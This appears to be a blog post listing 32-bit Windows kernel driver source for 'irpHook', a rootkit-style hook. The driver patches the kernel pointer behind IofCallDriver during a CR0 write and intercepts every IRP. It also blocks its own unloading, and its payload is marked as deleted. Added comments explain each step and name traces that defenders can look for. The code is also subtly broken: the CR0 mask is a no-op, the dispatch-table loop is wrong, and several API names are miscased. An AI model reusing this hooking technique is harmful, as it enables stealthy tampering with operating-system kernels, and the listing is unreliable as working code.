21Feb

irpHook的代码~

  /*
   * Replacement for the internal routine that IofCallDriver dispatches through
   * (installed by HookpIofCallDriver below). Emits a debug marker string, then
   * forwards the call to the saved original via the global old_piofcalldriver
   * (defined elsewhere in the file) using the FASTCALL register convention
   * (DeviceObject in ecx, Irp in edx) and returns the NTSTATUS it produced.
   * The author's own payload at "Code deleted" is not part of the listing.
   *
   * Defender note: the "Hacked Great!" DbgPrint fires for every forwarded IRP
   * and is a plain-text indicator in kernel debug output; the hook itself is
   * visible to any check that verifies the pointer IofCallDriver jumps through
   * still targets the kernel image.
   */
  NTSTATUS FASTCALL
  NewpIofCallDriver(
  IN PDEVICE_OBJECT DeviceObject,
  IN OUT PIRP Irp
  )
  {
  NTSTATUS stat;
  DbgPrint("Hacked Great!");
  //Code deleted
  /* Forward to the original with the FASTCALL arguments in ecx/edx and
   * capture its return value from eax. */
  __asm
  {
  mov ecx,DeviceObject
  mov edx,Irp
  Call old_piofcalldriver
  mov stat,eax
  }
  return stat;
  }
  /*
   * IRP_MJ_DEVICE_CONTROL handler. Recognises IOCTL_DISABLE and IOCTL_ENABLE
   * (their bodies were removed by the author) and completes them with
   * STATUS_SUCCESS; any other control code completes with STATUS_UNSUCCESSFUL.
   * Irp->IoStatus.Information is always reported as 0.
   */
  NTSTATUS DriverIoControl(
  IN PDEVICE_OBJECT DeviceObject,
  IN PIRP Irp)
  {
      PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation (Irp);
      ULONG outLen = stack->Parameters.DeviceIoControl.OutputBufferLength;
      PVOID sysBuf = Irp->AssociatedIrp.SystemBuffer;
      ULONG code = stack->Parameters.DeviceIoControl.IoControlCode;
      NTSTATUS result = STATUS_UNSUCCESSFUL;

      /* No data is ever returned to the caller by this handler. */
      Irp->IoStatus.Information = 0;

      if (code == IOCTL_DISABLE) {
          //Code deleted
          result = STATUS_SUCCESS;
      } else if (code == IOCTL_ENABLE) {
          //Code deleted
          result = STATUS_SUCCESS;
      }

      Irp->IoStatus.Status = result;
      IoCompleteRequest(Irp, IO_NO_INCREMENT);
      return result;
  }
  56.  
  /*
   * Shared IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes the request
   * successfully with no data (Information = 0).
   */
  NTSTATUS DrivercreateClose(
  IN PDEVICE_OBJECT DeviceObject,
  IN PIRP Irp)
  {
      NTSTATUS result = STATUS_SUCCESS;

      Irp->IoStatus.Status = result;
      Irp->IoStatus.Information = 0;
      IoCompleteRequest(Irp, IO_NO_INCREMENT);
      return result;
  }
  67.  
  /*
   * Unload routine: removes the symbolic link first, then the device object.
   * SymbolicLinkName and deviceObject are globals defined elsewhere. The
   * names as transcribed here (IodeleteSymbolicLink / IodeleteDevice) differ
   * in case from the WDK exports; this looks like an artifact of the listing.
   * Note that DriverEntry below clears DriverObject->DriverUnload after the
   * #ifdef DEBUG block, so this routine is never actually registered.
   */
  VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
  {
  IodeleteSymbolicLink(&SymbolicLinkName);
  IodeleteDevice(deviceObject);
  }
  /* IRP_MJ_CLOSE entry: delegates to DrivercreateClose unchanged. */
  NTSTATUS DriverClose(
  IN PDEVICE_OBJECT DeviceObject,
  IN PIRP Irp)
  {
      NTSTATUS result = DrivercreateClose(DeviceObject,Irp);
      return result;
  }
  /*
   * Catch-all major-function handler: completes the IRP without modifying
   * Irp->IoStatus (whatever the caller set there is reported) and returns
   * STATUS_SUCCESS.
   */
  NTSTATUS IoComplete(
  IN PDEVICE_OBJECT DeviceObject,
  IN PIRP Irp)
  {
      const NTSTATUS result = STATUS_SUCCESS;

      IoCompleteRequest(Irp,IO_NO_INCREMENT);
      return result;
  }
  87.  
  /*
   * Installs the IofCallDriver hook. First block: reads the 32-bit operand at
   * IofCallDriver+2 (presumably the address of the internal pointer the
   * exported stub jumps through — an assumption about the ntoskrnl build, not
   * verified here), loads the pointer it names and saves it in the global
   * old_piofcalldriver. Second block, run at DISPATCH_LEVEL: saves CR0 in the
   * global oData, writes CR0 back after masking it, stores NewpIofCallDriver
   * into that pointer, then restores CR0 from oData. Neither global is
   * declared in this listing.
   *
   * Defender note: after this runs, a kernel dispatch pointer resolves into a
   * third-party driver image instead of ntoskrnl; integrity checks of the
   * IofCallDriver indirection target, and the \Device\irphook name created in
   * DriverEntry, are the observable traces.
   */
  void HookpIofCallDriver()
  {
  KIRQL oldIrql;
  ULONG addr = (ULONG)IofCallDriver;
  /* Save the current dispatch target so NewpIofCallDriver can forward to it. */
  __asm
  {
  mov eax,addr
  mov esi,[eax+2]
  mov eax,[esi]
  mov old_piofcalldriver,eax
  }
  oldIrql = KeRaiseIrqlToDpcLevel();
  /* Save CR0, write the masked value, patch the pointer, restore CR0. */
  __asm{
  mov eax,cr0
  mov oData,eax
  and eax,0xffffffff
  mov cr0,eax
  mov eax,addr
  mov esi,[eax+2]
  mov dword ptr [esi],offset NewpIofCallDriver
  mov eax,oData
  mov cr0,eax
  }
  KeLowerIrql(oldIrql);
  return ;
  }
  /*
   * Driver entry point. Creates \Device\irphook with the symbolic link
   * \DosDevices\irphook, points the major-function table at IoComplete
   * (see the review note on the loop), registers the create and device-control
   * handlers, records the driver object in g_drvobj and finally installs the
   * IofCallDriver hook. DeviceName, SymbolicLinkName, deviceObject and
   * g_drvobj are globals defined elsewhere in the file.
   *
   * Defender note: the two object names above, together with a driver object
   * whose DriverUnload is NULL (cleared below), are the artifacts this driver
   * leaves once loaded.
   */
  NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,
  IN PUNICODE_STRING RegistryPath)
  {
  NTSTATUS status;
  PDRIVER_DISPATCH *ppdd;
  ULONG i;
  PCWSTR dDeviceName = L"\\Device\\irphook";
  PCWSTR dSymbolicLinkName = L"\\DosDevices\\irphook";

  RtlInitUnicodeString(&DeviceName, dDeviceName);
  RtlInitUnicodeString(&SymbolicLinkName, dSymbolicLinkName);
  /* Names as transcribed (IocreateDevice, IocreateSymbolicLink, IRP_MJ_create)
   * differ in case from the WDK spelling; kept exactly as in the listing. */
  status = IocreateDevice(DriverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, &deviceObject);
  if (!NT_SUCCESS(status)) return status;
  /* The symbolic-link result ends up as the return value but is not checked
   * before the rest of initialisation proceeds. */
  status = IocreateSymbolicLink(&SymbolicLinkName, &DeviceName);
  #ifdef DEBUG
  DriverObject->DriverUnload = DriverUnload;
  #endif
  /* Unconditional: DriverUnload is cleared whether or not DEBUG is defined,
   * so the driver cannot be unloaded once it has started. */
  DriverObject->DriverUnload =0;
  ppdd = DriverObject->MajorFunction;
  /* NOTE(review): the loop body assigns the table pointer ppdd itself rather
   * than an element of the dispatch table. */
  for(i =0;i<=IRP_MJ_MAXIMUM_FUNCTION;i++)
  ppdd = IoComplete;

  ppdd [IRP_MJ_create] = DrivercreateClose;
  ppdd [IRP_MJ_DEVICE_CONTROL ] = DriverIoControl;
  g_drvobj = DriverObject;
  /* Hook is installed last, after the device is reachable from user mode. */
  HookpIofCallDriver();
  return status;
  }
